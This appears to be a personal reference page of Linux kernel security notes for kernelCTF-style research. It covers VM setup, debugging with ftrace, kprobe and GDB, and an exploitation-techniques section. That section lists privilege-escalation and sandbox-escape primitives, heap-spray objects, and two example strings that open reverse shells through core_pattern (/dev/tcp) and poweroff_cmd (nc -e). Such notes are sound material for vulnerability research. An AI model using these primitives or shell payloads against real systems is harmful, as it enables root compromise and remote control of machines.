Welcome to Jekyll!
Linux Kernel
Resources
kernelCTF
VM setup
# 1. Get VM script
https://github.com/google/security-research/blob/88077ea2e1beaa17107cd9d7ee6beb97faa6468e/kernelctf/simulator/local_runner.sh
# 2. Update qemu script
-fsdev local,id=test_dev,path=<PATH_OF_SHARED_FOLDER>,security_model=none \
-device virtio-9p-pci,fsdev=test_dev,mount_tag=test_mount \
# 3. Mount 9pfs
## 3.1 unpack the ramdisk
gunzip ramdisk_v1.img
## 3.2 append the following line to file "/init"
mount -t 9p -o trans=virtio -o version=9p2000.L test_mount ${rootmnt}/chroot/mnt
## 3.3 pack back ramfs cpio
find . -print0 | cpio --null --owner=root -o --format=newc > ../ramdisk_v1.img
Information
# Kernel image (bzImage)
wget https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/bzImage
# Kernel image (vmlinux)
wget https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/vmlinux.gz
# Kernel config
wget https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/.config
# Source code info
## LTS
curl https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/COMMIT_INFO
wget https://github.com/gregkh/linux/archive/<COMMIT_HASH>.zip
wget https://github.com/gregkh/linux/archive/$(curl -s https://storage.googleapis.com/kernelctf-build/releases/lts-X.X.X/COMMIT_INFO | sed -n 's/COMMIT_HASH=//p').zip
## COS
curl https://storage.googleapis.com/kernelctf-build/releases/cos-X.X.X/COMMIT_INFO
wget https://cos.googlesource.com/third_party/kernel/+archive/<COMMIT_HASH>.tar.gz
wget https://cos.googlesource.com/third_party/kernel/+archive/$(curl -s https://storage.googleapis.com/kernelctf-build/releases/cos-X.X.X/COMMIT_INFO | sed -n 's/COMMIT_HASH=//p').tar.gz
# Commit info
https://github.com/torvalds/linux/commit/<COMMIT_HASH>
Compilation
# compile x64 version kernel on aarch64
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -j`nproc`
# kernel module
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -j`nproc` modules_prepare
Makefile of the kernel module test.c
obj-m += test.o
all:
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -C /<path_to_src> M=$(PWD) modules
clean:
make ARCH=x86_64 CROSS_COMPILE=x86_64-linux-gnu- -C /<path_to_src> M=$(PWD) clean
Modify Image
# 1. DOS/MBR boot sector image (e.g., kernelCTF image)
sudo mount -o loop,offset=1048576 <image_file> rootfs
sudo umount rootfs
# 2. Mount image via dbus on some Linux distributions
## attach image to loop device and mount in /media/<username>/...
udisksctl loop-setup -f <image_file>
## show all loop device
losetup -a
## unmount
udisksctl unmount -b /dev/loopN
Ubuntu specified version
# Ubuntu offical page
https://blueprints.launchpad.net/ubuntu/jammy/amd64/linux-image-5.15.0-69-generic/5.15.0-69.76
https://blueprints.launchpad.net/ubuntu/jammy/amd64/linux-modules-5.15.0-69-generic/5.15.0-69.76
# download image & modules
wget http://launchpadlibrarian.net/656759576/linux-image-5.15.0-69-generic_5.15.0-69.76_amd64.deb
wget http://launchpadlibrarian.net/656414807/linux-modules-5.15.0-69-generic_5.15.0-69.76_amd64.deb
# unpack & install
sudo dpkg -i *.deb
# find the menu entry
sudo awk -F\' '/menuentry / {print $4}' /boot/grub/grub.cfg
# fill the default kernel
sudo vim /etc/default/grub
## if output is "gnulinux-5.15.0-69-generic-advanced-277588d7-7692-4c38-8e63-1b553b7d66b8", set
## GRUB_DEFAULT="gnulinux-advanced-277588d7-7692-4c38-8e63-1b553b7d66b8>gnulinux-5.15.0-69-generic-advanced-277588d7-7692-4c38-8e63-1b553b7d66b"
# update grub
sudo update-grub
Ubuntu (24.04+) Debug
Source Code
- Add the below snippet to the file
/etc/apt/sources.list.d/ubuntu.sources
.Types: deb-src URIs: http://archive.ubuntu.com/ubuntu/ Suites: noble noble-updates noble-backports noble-proposed Components: main restricted universe multiverse Signed-By: /usr/share/keyrings/ubuntu-archive-keyring.gpg
-
Update the list of available packages by running
sudo apt update
. - Download the kernel source code.
sudo apt install dpkg-dev
apt source linux-image-unsigned-$(uname -r)
or
http://tw.archive.ubuntu.com/ubuntu/pool/main/l/linux/<linux_6.8.0.orig.tar.gz>
Debug Image
Ref: https://ubuntu.com/server/docs/debug-symbol-packages
- Install the dbgsym keyring.
sudo apt install ubuntu-dbgsym-keyring
- Create file
/etc/apt/sources.list.d/ddebs.list
with below content.deb http://ddebs.ubuntu.com noble main restricted universe multiverse deb http://ddebs.ubuntu.com noble-updates main restricted universe multiverse deb http://ddebs.ubuntu.com noble-proposed main restricted universe multiverse
- Download the kernel image with debug symbol.
apt install linux-image-unsigned-$(uname -r)-dbgsym
- Show debug package information.
dpkg-query -L linux-image-unsigned-$(uname -r)-dbgsym ## vmlinux path /usr/lib/debug/boot/vmlinux-6.8.0-49-generic ## kernel module path /usr/lib/debug/lib/modules/6.8.0-49-generic/kernel
RHEL (RedHat Enterprise for Linux)
Source Code
You may not be able to access the source code of RHEL directly. However, Rocky Linux is fully compatible with RHEL and is an open-source project. Therefore, you can theoretically view the source code through Rocky Linux instead.
The following link is one of the mirrors for Rocky Linux: https://mirrors.up.pt/rocky/9/BaseOS/source/tree/Packages/k/
rpm2cpio kernel-5.14.0-503.40.1.el9_5.src.rpm > tmp.cpio
cpio -i -d < tmp.cpio
ls -al linux-5.14.0-503.40.1.el9_5.tar.xz
Installation
RedHat provides a no-cost subscription for developers, so you don’t need to purchase or subscribe to a license. For more details, please refer to the link below: https://developers.redhat.com/articles/faqs-no-cost-red-hat-enterprise-linux
Others
Update the kernel to the latest:
sudo dnf install kernel
The kernel module path (RHEL 9.5):
/lib/modules/5.14.0-503.XXX.1.el9_5.x86_64
ftrace
cat /proc/kallsyms | grep function_name # make sure the function is not inlined
echo \<function_name\> > /sys/kernel/debug/tracing/set_ftrace_filter
echo function > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/options/func_stack_trace
echo 1 > /sys/kernel/debug/tracing/tracing_on
# ... trigger function
cat /sys/kernel/debug/tracing/trace
# clear output
echo > /sys/kernel/debug/tracing/trace
# turn off
echo 0 > /sys/kernel/debug/tracing/tracing_on
kprobe
# Set a return probe (r = return probe) on the function and print its return value
echo 'r:myprobe <function_name> $retval' > /sys/kernel/debug/tracing/kprobe_events
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
# Set a return probe and print the 64-bit value at an offset of 80 bytes from the return value (used as a pointer)
echo 'r:myprobe <function_name> data_ptr=+80($retval):u64' > /sys/kernel/debug/tracing/kprobe_events
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
# Set an entry probe (p = probe) on the function and print the third argument
echo 'p:myprobe <function_name> $arg3' > /sys/kernel/debug/tracing/kprobe_events
echo 1 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
echo 0 > /sys/kernel/debug/tracing/events/kprobes/myprobe/enable
# Display the trace output and then clear the trace buffer
cat /sys/kernel/debug/tracing/trace
echo > /sys/kernel/debug/tracing/trace
Common Objects Refcount Fields
// struct file
// refcount++: fdget()
// refcount--: fdput()
file->f_count;
// struct sock
// refcount++: sock_hold()
// refcount--: sock_put()
#define sk_refcnt __sk_common.skc_refcnt
sk->__sk_common.skc_refcnt;
// struct mm_struct
// refcount++: mmgrab()
// refcount++: mmdrop()
mm->mm_count;
// struct mm_strucut (user space)
// refcount++: mmget() / mmget_not_zero()
// refcount--: mmput()
mm->mm_users;
// struct pid
// refcount++: get_pid()
// refcount--: put_pid()
pid->count;
// struct task_struct
// refcount++: get_task_struct()
// refcount--: put_task_struct()
t->usage;
// struct cred
// refcount++: get_cred()
// refcount--: put_cred()
cred->usage;
// struct page
// refcount++: try_get_page()
// refcount--: put_page_testzero()
page->_refcount;
// struct ns_common ns (namespace member)
// take time_namespace (struct time_namespace) as example
// refcount++: get_time_ns()
// refcount--: put_time_ns()
ns->ns.count;
// struct nsproxy ns
// refcount++: get_nsproxy()
// refcount--: put_nsproxy()
ns->count;
// struct user_struct
// refcount++: get_uid()
// refcount--: free_uid()
u->__count;
// struct files_struct (current->files)
// refcount++: atomic_inc(&oldf->count)
// refcount--: put_files_struct()
files->count;
Common Objects Lock Functions
// struct mm_struct
mmap_read_lock(current->mm);
mmap_read_unlock(current->mm);
// struct sock
lock_sock(sk);
release_sock(sk);
// struct files_struct
spin_lock(&files->file_lock);
/* fdt = files_fdtable(files) */
spin_unlock(&files->file_lock);
virt & page
#define __START_KERNEL_map (0xffffffff80000000)
extern unsigned long phys_base; // 0 when nokaslr
extern unsigned long page_offset_base; // 0xffff888000000000 when nokaslr
extern unsigned long vmemmap_base; // 0xffffea0000000000 when nokaslr
struct page *virt_to_page(unsigned long virt_addr) {
unsigned long pfn;
if (virt_addr > __START_KERNEL_map)
pfn = (virt_addr - __START_KERNEL_map + phys_base) >> 12;
else
pfn = (virt_addr - page_offset_base) >> 12;
// sizeof(struct page) == 0x40
return vmemmap_base + 0x40 * pfn;
}
void *page_to_virt(unsigned long page_addr) {
unsigned long pfn = (page_addr - vmemmap_base) / 0x40;
return (pfn << 12UL) + page_offset_base;
}
Exploit
Techiques
Pin CPU
sched_setaffinity()
orpthread_setaffinity_np()
void pin_on_cpu(int cpu_id)
{
cpu_set_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(cpu_id, &cpuset);
sched_setaffinity(0, sizeof(cpu_set_t), &cpuset);
}
KASLR bypass
-
Use side channels like EntryBleed.
-
In older versions of Ubuntu, the kernel function
startup_xen
address could be read from/sys/kernel/notes
. (fixed by CVE-2024-26816)
Auto-reboot after panic or oops
- Set
panic_on_oops=1
andpanic_timeout=1
Global variable hijacking
-
modprobe_path[]
-
It will be triggered when attempting to execute an unknown format file.
-
E.g.
modprobe_path[] = "/tmp//modprobe"
-
-
core_pattern[]
-
It will be triggered when an executable causes an SIGSEGV, or zero out
task_struct->mm->pgd
to trigger page fault. -
E.g.
core_pattern[] = "|/bin/bash -c sh</dev/tcp/ip/port"
-
-
poweroff_cmd[]
-
It won’t be triggered basically; you need chain it with other gadgets, such as
tcp_prot.close = &poweroff_work_func
. -
E.g.
poweroff_cmd[] = "/bin/sh -c /bin/sleep${IFS}10&&/usr/bin/nc${IFS}-lnvp${IFS}13337${IFS}-e${IFS}/bin/bash"
-
-
compat_elf_format->load_binary
(lastformats
entry)-
The rbx will be file content, which allows you to do ROP chain
-
It can be triggered by executing a file with unknown format
-
Kernel shellcode
-
Set kernel address as executable by
set_memory_x(page_aligned_addr, num_of_page)
. -
Leak ktext in shellcode - instruction
rdmsr
withMSR_LSTAR
. (seesyscall_init()
for more details)
Privilege escalation
commit_creds(&init_cred)
Sandbox escape
-
ROP do
switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
-
Return to userspace and switch to root ns by
setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0);
Find target task
-
prctl(PR_SET_NAME)
changes the process name to a unique ID. -
Start iterating through the
struct task
linked list from&init_task
and compare each task’s name with the unique ID.
Fixed kernel address
- Before Linux v6.1, the kernel address of the CEA (CPU Entry Area) was fixed at
0xfffffe0000000000
, making it possible to place the exploit payload there by triggering an exception.
Bypass error during ROP
- “Illegal context switch in RCU read-side critical section”
- Set
current->rcu_read_lock_nesting = 0
.
- Set
- “BUG: scheduling while atomic: …”
- Set
oops_in_progress=1
, making__schedule_bug()
return safely.
- Set
ROP return to userspace
-
Use trampoline
swapgs_restore_regs_and_return_to_usermode()
. (renamed tocommon_interrupt_return()
now) -
When executing
iretq
, the stack layout should be (from top to bottom): rip, cs, rflags, rsp and ss. -
Process calls helper to save state before exploiting.
static void save_state() { asm( "movq %%cs, %0\n" "movq %%ss, %1\n" "pushfq\n" "popq %2\n" "movq %%rsp, %3\n" : "=r"(cs), "=r"(ss), "=r"(rflags), "=r"(rsp) : : "memory"); }
- By using
vfork()
orsys_fork()
combined withmsleep()
, the new child process is allowed to continue running while the corrupted parent process remains stuck in kernel space.
Pipe object
-
Pipe primitive (DirtyPipe) - mark the merge bit
PIPE_BUF_FLAG_CAN_MERGE
. -
PageJack - partial overwrite the
struct page *
field.
binfmt
-
Call
__register_binfmt()
to register the corrupted object into the global linked list. -
Reclaim the object and create a fake
struct linux_binfmt
object. -
Trigger ROP when analyzing the file format
Extend race window
-
make all timerfds wakeup at the same time
int epoll_fd[EPOLL_CNT]; int tfds[TFDS_CNT]; int timer_fd = timerfd_create(CLOCK_MONOTONIC, 0); struct epoll_event event = { .events = 0 }; struct itimerspec new = {.it_value.tv_nsec = 20}; for (int i = 0; i < EPOLL_CNT; i++) epoll_fd[i] = epoll_create(1); for (int i = 0; i < TFDS_CNT; i++) tfds[i] = dup(timer_fd); for (int j = 0; j < EPOLL_CNT; j++) { for (int i = 0; i < TFDS_CNT; i++) { event.data.fd = tfds[i]; epoll_ctl(epoll_fd[j], EPOLL_CTL_ADD, tfds[i], &event); } } timerfd_settime(timer_fd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
Objects
struct name | size | flags | new | free |
---|---|---|---|---|
seq_operations | 0x20 | GFP_KERNEL_ACCOUNT | shmat | shmdt |
shm_file_data | 0x20 | GFP_KERNEL_ACCOUNT | open “/proc/self/stat” | close |
msg_msg | 0x30 ~ 0x1000 | GFP_KERNEL_ACCOUNT | msgsnd | msgrcv |
msg_msgseg | 0x08 ~ 0x1000 | GFP_KERNEL_ACCOUNT | msgsnd (larger than 0x1000 - 0x30) | msgrcv |
user_key_payload | 0x18 ~ 0x7fff | GFP_KERNEL | add_key | keyctl_unlink |
pipe_buffer | 0x280 | GFP_KERNEL_ACCOUNT | pipe | close |
timerfd_ctx | 0xd8 | GFP_KERNEL | timerfd_create | close |
tty_struct | 0x2b8 | GFP_KERNEL_ACCOUNT | open “/dev/ptmx” | close |
poll_list | 0x10 ~ 0x1000 | GFP_KERNEL | poll | close |
pg_vec | pages | X | setsockopt PACKET_VERSION and PACKET_TX_RING | close |
sendmsg | 0x10 ~ 0x5000 | GFP_KERNEL | sendmsg | |
setxattr | 0x1 ~ 0xffff | GFP_KERNEL | setxattr | |
ctl_buf | 0 ~ 0x5000 | GFP_KERNEL | ||
xdp_umem | 0x70 | |||
netlink_sock | 0x468 |
Some tricks
- sendmsg - the buffer allocated by sendmsg is released immediately. However, we can leverage
setsockopt(SO_{SND,RCV}BUF)
to fill the send and receive buffer, preventing the buffer from being released.int n = 0x0; int sfd[2]; socketpair(AF_UNIX, SOCK_STREAM, 0, sfd); setsockopt(sfd[1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); // 0x1200 (min sndbuf size) setsockopt(sfd[0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); // 0x0900 (min rcvbuf size) write(sfd[1], buf, 0x1181); // hanging
-
pipe_buffer - we can use
fcntl(F_SETPIPE_SZ)
to adjust the size. - msg_msg - with
MSG_COPY
, we can leak addresses without releasing the object.
Features
Migitations
Name | Description |
---|---|
CONFIG_SLAB_FREELIST_RANDOM | Randomizes the freelist order, making the retrieval order of objects within the same slab unpredictable. |
CONFIG_SLAB_FREELIST_HARDENED | Provides enhanced security by checking for double free, randomizing the next pointer, and enforcing pointer alignment. Since allocations directly use c->freelist for returning objects, if the victim object is at the freelist head, it bypasses freelist_ptr_{decode,encode}() and avoids corruption. |
CONFIG_HARDENED_USERCOPY | Hardens memory copying between the kernel and userspace using check_object_size() . For example, copy_to_user() cannot copy data exceeding the size of the object. |
CONFIG_KMALLOC_SPLIT_VARSIZE | Allocates variable-sized objects in separate caches. However, it does not prevent UAF if the vulnerable object itself is variable-sized. |
CONFIG_DEBUG_LIST | Emits a warning when a double unlink is detected but performs no additional actions. |
CONFIG_RANDOMIZE_BASE | Implements KASLR. |
CONFIG_SLAB_VIRTUAL | Ensures slab virtual memory is never reused for a different slab. |
CONFIG_RANDOM_KMALLOC_CACHES | There are multiple generic slab caches for each size, 16 by default. The kenrel selects random slabs based on _RET_IP_ and a random seed. |
CONFIG_INIT_STACK_ALL_ZERO | Initializes everything on the stack (including padding) with a zero value. |
Capabliliby
ns_capable()
- creating a new namespace can bypass this check. Common capabilities include CAP_SYS_ADMIN
(user) or CAP_NET_ADMIN
(network), etc.
bool ns_capable(struct user_namespace *ns, int cap)
{
return ns_capable_common(ns, cap, CAP_OPT_NONE);
}
capable()
- global, and cannot be bypassed using a new namespace.
bool capable(int cap)
{
return ns_capable(&init_user_ns, cap);
}
Preemption
Name | Description |
---|---|
CONFIG_PREEMPTION | Configures whether preemption models are enabled. |
CONFIG_PREEMPT | A preemption model where all kernel code is preemptible. This option is generally not enabled by default. |
CONFIG_PREEMPT_VOLUNTARY | Another preemption model where kernel code includes specific preemption points that allow rescheduling. |
Others
x64 RO data writable
- When
X86_CR0_WP
(write protect) is set, the CPU cannot write to read-only pages when privilege level is 0.
Interrupt disabled / enabled
disable_irq()
internally calls__irq_disable()
, which ultimately executes thecli
instruction to disable interrupts; enabling interrupts follows a similar path and eventually executes thesti
instruction.- Even though
cli
clears the IF (Interrupt Enable) flag, the NMI (Non-Maskable Interrupt), whose interrupt number is 2, can still be triggered.
Debug
gdb-multiarch ./vmlinux -ex "target remote :1234"
## handle KASLR
symbol-file ./vmlinux -o <offset> # _stext - 0xffffffff81000000
GDB Stubs
# breakpoint at specific syscall
b __do_sys_<SYSCALL_NAME>
# breakpoint at syscall entry
b entry_SYSCALL_64
# show which slab the address belong to
slab contains 0xffff888104b2b2a0
## output: 0xffff888104b2b2a0 @ kmalloc-96
# show slab info
slab info kmalloc-96
# show page tables
pt
pahole
pahole -s ./vmlinux | grep -P "\t<size>\t"
pahole -C <struct_name> ./vmlinux